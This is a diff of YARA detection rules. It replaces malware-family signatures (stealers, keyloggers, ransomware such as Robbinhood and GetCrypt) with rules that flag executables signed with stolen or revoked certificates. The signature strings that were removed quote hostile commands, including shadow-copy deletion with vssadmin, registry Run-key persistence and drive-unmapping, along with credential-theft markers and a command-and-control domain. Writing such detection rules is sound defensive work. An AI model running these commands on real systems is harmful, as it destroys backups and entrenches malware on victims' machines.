-		$s2 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
-		$s3 = "\\Passwords.txt" ascii
-		$s4 = "TJKeyLogItem" fullword ascii
-		$s5 = "TJKeyAsyncLog" fullword ascii
-		$s6 = "FM_GETDSKLST" fullword ascii
-		$s7 = "KL_GETMODE" fullword ascii
+		thumbprint = "8e99b2786f59e543d1f3d02d140e35342c55c18a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "gsLPuSUgRZueWihiZHqYBriNSQqS" and pe.signatures [ i ] . serial == "24:9e:3f:1b:75:95:e7:d0:fe:6d:f1:33:03:28:73:43" )
 }
-rule DITEKSHEN_MALWARE_Win_W1RAT : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_31D852F5Fca1A5966B5Ed08A14825C54 : FILE
 {
 	meta:
-		description = "W1 RAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d5841bc0-97e7-575e-91f6-d264f507a8b5"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8d65caa2-ce28-5f9b-b8a5-3fe903dd5628"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L569-L585"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5020-L5031"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84b9a2e309ed9ab0fb8343d941585356d23348683073d0a37fc7194f58a43a0e"
+		logic_hash = "e2890f8c623ce15d8a3f996e87be4b73a8cd9f96386ce8d356d7e0fad0342dd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/c /Ox /Fa\"%s/%s.asm\" /Fo\"%s/%s.obj\" \"%s/%s.%s\"" ascii
-		$s2 = "this->piProcInfo.hProcess" fullword ascii
-		$s3 = "index >= 0 && index < this->reg_tab->GetLen()" fullword ascii
-		$s4 = "strcpy(log_font.lfFaceName,\"%s\");" fullword ascii
-		$s5 = "WorkShop -- [%s]" fullword ascii
-		$s6 = "HeaderFile.cpp" fullword ascii
-		$s7 = "WndLog.cpp" fullword ascii
-		$s8 = "assertion fail \"%s\" at file=%s line=%d" fullword ascii
-		$s9 = "Stdin   pipe   creation   failed" fullword ascii
+		thumbprint = "a657b8f2efea32e6a1d46894764b7a4f82ad0b56"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BBT KLA d.o.o." and pe.signatures [ i ] . serial == "31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" )
 }
-rule DITEKSHEN_MALWARE_Win_Raccoon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_510C5E540503F30C9Caa3082296Aa452 : FILE
 {
 	meta:
-		description = "Raccoon stealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5ebef663-623c-592e-b69a-f620492f0cc1"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "eddbe6f1-fb7c-5129-afb4-6b4d67e39f60"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L587-L606"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5033-L5045"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "258481982d20d229506f442a5a205fdc05f6ac4399f3a0665860e6529c30943b"
+		hash = "cb01f31a322572035cf19f6cda00bcf1d8235dcc692588810405d0fc6e8d239c"
+		logic_hash = "9b6ad8b3e90fcd63f86b353e89ce7e6226197bfcb491e2151b8dbf580466076e"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "inetcomm server passwords" fullword wide
-		$s2 = "content-disposition: form-data; name=\"file\"; filename=\"data.zip\"" fullword ascii
-		$s3 = ".?AVfilesystem_error@v1@filesystem@experimental@std@@" fullword ascii
-		$s4 = "CredEnumerateW" fullword ascii
-		$s5 = "%[^:]://%[^/]%[^" fullword ascii
-		$s6 = "%99[^:]://%99[^/]%99[^" fullword ascii
-		$s7 = "Login Data" wide
-		$s8 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide
-		$x1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide
-		$x2 = "\\json.hpp" wide
-		$x3 = "Microsoft_WinInet_" fullword wide
-		$x4 = "Microsoft_WinInet_*" fullword wide
+		thumbprint = "3e56a13ceb87243b8b2c5de67da54a3a9e0988d7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 3 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Systems Analysis 360 Ltd" and pe.signatures [ i ] . serial == "51:0c:5e:54:05:03:f3:0c:9c:aa:30:82:29:6a:a4:52" )
 }
-rule DITEKSHEN_MALWARE_Win_Tefosteal : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_56Bba7Fe242E6B49695Bcf07870F5F5E : FILE
 {
 	meta:
-		description = "Tefosteal payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "56646933-3ed3-5b77-9135-993b57603490"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "902c1949-81e6-5070-ac60-2ebbb363fc6d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L653-L674"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5047-L5058"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a350863270cbe3349f271e55d66a2ebdd6406e8d122c11071de74a774eb77ebf"
+		logic_hash = "6c9da28b90bcff069509fc8e91c0a960805bb8339d0fa21f5466c38b6d20f95f"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Tefosteal"
-
-	strings:
-		$s1 = "netsh wlan show networks mode=bssid" nocase fullword wide
-		$s2 = "LoginCredentialService.GetLoginCredentials$" ascii
-		$s3 = "DefaultLoginCredentials.LoginEventUsrPw$" ascii
-		$s4 = "SEC_E_NO_KERB_KEY" wide
-		$s5 = "TList<System.Zip.TZipHeader>." ascii
-		$s6 = "_Password.txt" fullword wide nocase
-		$s7 = "_Cookies.txt" fullword wide nocase
-		$f1 = "\\InfoPC\\BSSID.txt" wide
-		$f2 = "\\Files\\Telegram\\" wide
-		$f3 = "\\InfoPC\\Screenshot.png" wide
-		$f4 = "\\InfoPC\\Systeminfo.txt" wide
-		$f5 = "\\Steam\\config" wide
-		$f6 = "\\delete.vbs" wide
+		thumbprint = "3c176bff246a30460311e8c71f880cad2a845164"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) and 2 of ( $f* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ewGMiQgCHj" and pe.signatures [ i ] . serial == "56:bb:a7:fe:24:2e:6b:49:69:5b:cf:07:87:0f:5f:5e" )
 }
-rule DITEKSHEN_MALWARE_Win_Cryptostealergo : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Dfef1A8C0Dbfef64Bc6C8A0647D6E873 : FILE
 {
 	meta:
-		description = "CryptoStealerGo payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "83886aeb-af7e-564c-989a-fb7d955814e2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a8e2a271-399f-531a-8e69-27a1598ba086"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L676-L692"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5060-L5071"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0050be7522e7d89cb9688e63fdca11d24baa74aa858e8c19ee7b4658518536b6"
+		logic_hash = "104f066ddfd34edc328844d06a84a1663b0d271c02599825c1797704e582883a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"" ascii
-		$s2 = "file_upload.go" ascii
-		$s3 = "grequests.FileUpload" ascii
-		$s4 = "runtime.newproc" ascii
-		$s5 = "credit_cards" ascii
-		$s6 = "zip.(*fileWriter).Write" ascii
-		$s7 = "autofill_" ascii
-		$s8 = "XFxVc2VyIERhdGFcXA==" ascii
-		$s9 = "XFxBcHBEYXRhXFxMb2NhbFxc" ascii
+		thumbprint = "0709cdcb27230171877e2a11e6646a9fde28e02c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NnTqRHlSFNJSUHGaiKWzqyHGdPzBarblmWEzpKHvkZrqn" and pe.signatures [ i ] . serial == "00:df:ef:1a:8c:0d:bf:ef:64:bc:6c:8a:06:47:d6:e8:73" )
 }
-rule DITEKSHEN_MALWARE_Win_M00Nd3V : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0609B5Aad2Dfb81Fbe6B75E4Cfe372A6 : FILE
 {
 	meta:
-		description = "M00nD3v keylogger payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4000f55d-e072-50b6-b6ee-72cefc0ec53f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "db7bf2e3-f514-5133-a35a-87c43a5f12cf"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L694-L715"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5073-L5084"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68a0888da3b114dc895fe18a3d03b2b88d140fbf82b888f7a031b9364d01aabf"
+		logic_hash = "2f483d06fd7af8db8e79203dcd4252d74f4859c0681e0bfcc4a97b351cb758a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "M00nD3v Stub" ascii wide
-		$s2 = "M00nD3v{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" fullword wide
-		$s3 = "Anti-Keylogger Elite" wide
-		$s4 = "/C TASKKILL /F /IM" wide
-		$s5 = "echo.>{0}:Zone.Identifier" fullword wide
-		$s6 = "> Nul & Del \"{0}\" & start \"\" \"{1}.exe\"" wide
-		$s7 = "> Nul & start \"\" \"{1}.exe\"" wide
-		$s8 = "Stealer" fullword wide
-		$s9 = "{0}{0}++++++++++++{1} {2}++++++++++++{0}{0}" wide
-		$s10 = "{4}Application: {3}{4}URL: {0}{4}Username: {1}{4}Password: {2}{4}" wide
-		$s11 = "encrypted_key\":\"(?<Key>.+?)\"" wide
-		$s12 = "Botkiller" fullword ascii
-		$s13 = "AVKiller" fullword ascii
-		$s14 = "get_pnlPawns" fullword ascii
+		thumbprint = "a30013d7a055c98c4bfa097fe85110629ef13e67"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of them ) or ( 9 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "vVBhgeghjdigSdWYSAdmy" and pe.signatures [ i ] . serial == "06:09:b5:aa:d2:df:b8:1f:be:6b:75:e4:cf:e3:72:a6" )
 }
-rule DITEKSHEN_MALWARE_Win_Vssdestroy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02B6656292310B84022Db5541Bc48Faf : FILE
 {
 	meta:
-		description = "VSSDestroy/Matrix ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "734ece56-b993-5b44-ae15-f673fabfe8ad"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "252c8339-73d3-5de0-8f75-78a6a2da4abc"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L717-L740"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5086-L5097"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24bfd32580f784440252d629a7ab86b84a570ded34409940616be2a89bf73088"
+		logic_hash = "374f7abfab6f7def8b895dc9536ca6bb7a605e9478934af6c97e8b7595fbee19"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920008-920009"
-		clamav_sig = "MALWARE.Win.Ransomware.VSSDestroy"
-
-	strings:
-		$o1 = "[SHARESSCAN]" wide
-		$o2 = "[LDRIVESSCAN]" wide
-		$o3 = "[LOGSAVED]" wide
-		$o4 = "[LPROGRESS]" wide
-		$o5 = "[FINISHSAVED]" wide
-		$o6 = "[ALL_LOCAL_KID]" wide
-		$o7 = "[DIRSCAN" wide
-		$o8 = "[GENKEY]" wide
-		$s1 = "\\cmd.exe" nocase wide
-		$s2 = "/C powershell \"" nocase wide
-		$s3 = "%COMPUTERNAME%" wide
-		$s4 = "%USERNAME%" wide
-		$s5 = "Error loading Socket interface (ws2_32.dll)!" wide
-		$s6 = "Old file list dump found. Want to load it? (y/n):" fullword wide
+		thumbprint = "bb58a3d322fd67122804b2924ad1ddc27016e11a"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 4 of ( $o* ) and 3 of ( $s* ) ) or ( 5 of ( $o* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DILA d.o.o." and pe.signatures [ i ] . serial == "02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" )
 }
-rule DITEKSHEN_MALWARE_Win_Goldenaxe : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D609B6C95428954A999A8A99D4F198Af : FILE
 {
 	meta:
-		description = "GoldenAxe ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "23874106-dbbb-5cb2-b61a-1661d8e2d868"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "e1b732d2-24fd-5819-a26a-049a9a569089"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L742-L763"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5099-L5110"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6dfd88ce65acdfed4749e3b817b317c3c514ea42f892a7f5f95853c148507918"
+		logic_hash = "62eecc7cf240b9de6e04a43413bbeb84b673e9d3f1c4d67ec4082c099c6a87db"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.GoldenAxe"
-
-	strings:
-		$s1 = "Go build ID: " ascii
-		$s2 = "taskkill.exe" ascii
-		$s3 = "cmd.exe" ascii
-		$s4 = "Speak.Speak" ascii
-		$s5 = "CLNTSRVRnull" ascii
-		$s6 = "-----END" ascii
-		$s7 = "-----BEGIN" ascii
-		$s8 = ".EncryptFile" ascii
-		$g1 = "GoldenAxe/Utils." ascii
-		$g2 = "GoldenAxe/Cryptography." ascii
-		$g3 = "GoldenAxe/Walker." ascii
-		$g4 = "C:/Users/alpha/go/src/GoldenAxe/" ascii
-		$g5 = "'Golden Axe ransomware'" ascii
+		thumbprint = "b1d8033dd7ad9e82674299faed410817e42c4c40"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $g* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fudl" and pe.signatures [ i ] . serial == "00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" )
 }
-rule DITEKSHEN_MALWARE_Win_Robbinhood : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6A568F85De2061F67Ded98707D4988Df : FILE
 {
 	meta:
-		description = "Robbinhood ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a5066a22-3c87-5e9f-a94f-5a44af2f96fd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "ed8748ce-cd90-527b-a58e-da9c7164ed18"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L765-L787"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5112-L5123"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1c4226ed5cb1583418d5ef0efc2c2b5bc3cfe7f148f359c5d432fd660331a46"
+		logic_hash = "f1aea9f6237cfbda49fea6d38ece935f9d4cc5abc678590c63b9a339aa37e104"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Robbinhood"
-
-	strings:
-		$go = "Go build ID:" ascii
-		$cmd1 = "cmd.exe /c" ascii
-		$cmd2 = "net use * /DELETE" nocase ascii
-		$cmd3 = "sc.exe stop" ascii
-		$cmd4 = "vssadmin resize shadowstorage" nocase ascii
-		$s1 = /Skipping\s(file|dir)/ ascii
-		$s2 = "Encrypt[ERR] GET Size:" ascii
-		$s3 = ".taskkilltasklistunknown(" ascii
-		$s4 = ".sysvssadmin.exewevtutil.exe MB released" ascii
-		$s5 = ".sysvssadmin.exewevtutil.exewinlogin.exewinlogon.exe MB released" ascii
-		$s6 = ".enc_robbinhood" ascii
-		$s7 = "c:\\windows\\temp\\pub.key" nocase ascii
-		$s8 = "main.CoolMaker" ascii
-		$s9 = "/valery/go/src/oldboy/" ascii
+		thumbprint = "ed7e16a65294086fbdeee09c562b0722fdb2db48"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $go and 1 of ( $cmd* ) and 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Apladis" and pe.signatures [ i ] . serial == "6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" )
 }
-rule DITEKSHEN_MALWARE_Win_Getcrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F90E68Cbf92Fd7Ad409E281C3F2A0F0A : FILE
 {
 	meta:
-		description = "GetCrypt ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fb6db807-372f-59e6-96c6-54dd4ece336d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "e92daa7b-2d8a-5806-840e-678a9aa24fef"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L789-L825"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5125-L5137"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fd7ee98757c3ac1f2b2a4dd9041c78d33273d7a7d596c3d99c6b8d79988f29f1"
+		hash = "d79a8f491c0112c3f26572350336fe7d22674f5550f37894643eba980ae5bd32"
+		logic_hash = "ca8d80a446df0c28e9fb4944bd69d9fa008be968c449e5a469b182fbf8744a3f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig1 = "MALWARE_Win.Ransomware.GetCrypt-1"
-		clamav_sig2 = "MALWARE_Win.Ransomware.GetCrypt-2"
-
-	strings:
-		$x1 = "delete shadows /all /quiet" wide
-		$x2 = "C:\\Windows\\System32\\svchost.exe" fullword wide
-		$x3 = "desk.bmp" fullword wide
-		$x4 = ":\\Boot" fullword wide
-		$x5 = "\\encrypted_key.bin" fullword wide
-		$x6 = "vssadmin.exe" fullword wide
-		$x7 = ":\\Recovery" fullword wide
-		$s1 = "CryptEncrypt" fullword ascii
-		$s2 = "NtWow64ReadVirtualMemory64" fullword ascii
-		$s3 = "MPR.dll" fullword ascii
-		$s4 = "%key%" fullword ascii
-		$s5 = "CryptDestroyKey" fullword ascii
-		$s6 = "ntdll.dll" fullword ascii
-		$s7 = "WNetCancelConnection2W" fullword ascii
-		$s8 = ".%c%c%c%c" fullword wide
-		$s10 = { 43 72 79 70 74 49 6d 70 6f 72 74 4b 65 79 00 00
-                 cb 00 43 72 79 70 74 45 6e 63 72 79 70 74 00 00
-                 c1 00 43 72 79 70 74 41 63 71 75 69 72 65 43 6f
-                 6e 74 65 78 74 41 00 00 c8 00 43 72 79 70 74 44
-                 65 73 74 72 6f 79 4b 65 79 00 d2 00 43 72 79 70
-                 74 47 65 6e 52 61 6e 64 6f 6d 00 00 c2 00 43 72
-                 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78
-                 74 57 00 00 41 44 56 41 50 49 33 32 2e 64 6c 6c
-                 00 00 b5 01 53 68 65 6c 6c 45 78 65 63 75 74 65
-                 45 78 57 00 53 48 45 4c 4c 33 32 2e 64 6c 6c 00 }
+		thumbprint = "c202564339ddd78a1ce629ce54824ba2697fa3d6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 8 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SUCK-MY-DICK-ESET" and pe.signatures [ i ] . serial == "f9:0e:68:cb:f9:2f:d7:ad:40:9e:28:1c:3f:2a:0f:0a" )
 }
-rule DITEKSHEN_MALWARE_Joego : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7Ddd3796A427B42F2E52D7C7Af0Ca54F : FILE
 {
 	meta:
-		description = "JoeGo ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "23d38bcd-e66d-5ff1-ad6a-3e6432d83562"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2619669f-cceb-5177-9738-d28236e1344e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L827-L847"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5139-L5150"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ddf3506aefb3cd1845f9daa689848a02a2422ca98c5c984bc918cc7ea2b2677"
+		logic_hash = "15df43212a842936e2ea0d834797f11fe80af3d376a19aa9a806aa6ed793e679"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.JoeGo"
-
-	strings:
-		$go = "Go build ID:" ascii
-		$s1 = "%SystemRoot%\\system32\\%v." ascii
-		$s2 = "REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V" ascii
-		$s3 = "/t REG_SZ /F /D %userprofile%\\" ascii
-		$s4 = "(sensitive) [recovered]" ascii
-		$s5 = "/dev/stderr/dev/stdout/index.html" ascii
-		$s6 = "%userprofile%\\SystemApps" ascii
-		$s7 = "p=<br>ACDTACSTAEDTAESTAKDTAKSTAWSTA" ascii
-		$cnc1 = "/detail.php" ascii
-		$cnc2 = "/checkin.php" ascii
-		$cnc3 = "/platebni_brana.php" ascii
-		$cnc4 = "://nebezpecnyweb.eu/" ascii
+		thumbprint = "b5cd5a485dee4a82f34c98b3f108579e8501fdea"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $go and ( all of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $cnc* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fobos" and pe.signatures [ i ] . serial == "7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" )
 }
-rule DITEKSHEN_MALWARE_Win_Aurora : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_17D99Cc2F5B29522D422332E681F3E18 : FILE
 {
 	meta:
-		description = "Aurora ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d3eafe9c-c8d9-5744-ba5d-4eb0249cceea"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "98493d50-2bee-50a5-93f3-851559c494a6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L849-L869"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5152-L5163"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "056bb11e8b947ef90462503db82b2001e4a5d4847fad9c0d5d771384a80d779a"
+		logic_hash = "95116d1114239795707b310afea3122d274dac471546de1e0147992d1f3a1d4f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii wide
-		$s2 = "#DECRYPT_MY_FILES#.txt" fullword ascii
-		$s3 = "/gen.php?generate=" fullword ascii
-		$s4 = "geoplugin.net/php.gp" ascii
-		$s5 = "/end.php?id=" fullword ascii
-		$s6 = "wotreplay" fullword ascii
-		$s7 = "moneywell" fullword ascii
-		$s8 = "{btc}" fullword ascii
-		$s9 = ".?AV_Locimp@locale@std@@" ascii
-		$s10 = ".?AV?$codecvt@DDU_Mbstatet@@@std@@" ascii
-		$s11 = ".?AU_Crt_new_delete@std@@" ascii
-		$pdb1 = "\\z0ddak\\Desktop\\source\\Release\\Ransom.pdb" ascii
-		$pdb2 = "\\Desktop\\source\\Release\\Ransom.pdb" ascii
+		thumbprint = "969932039e8bf3b4c71d9a55119071cfa1c4a41b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 5 of ( $s* ) ) or ( 8 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PKV Trading ApS" and pe.signatures [ i ] . serial == "17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" )
 }
-rule DITEKSHEN_MALWARE_Win_Buran : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02De1Cc6C487954592F1Bf574Ca2B000 : FILE
 {
 	meta:
-		description = "Buran ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1433bac5-2ece-54bb-8e57-b5834fffc719"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "1dc1b576-34f4-5017-8340-c6f58692a31c"
